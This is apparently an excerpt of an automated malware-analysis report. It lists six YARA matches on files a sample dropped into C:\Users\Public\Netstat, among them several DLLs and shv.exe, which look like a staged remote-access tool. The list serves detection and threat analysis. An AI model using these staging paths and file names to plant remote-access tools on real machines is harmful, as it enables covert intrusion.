Source: Yara match File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED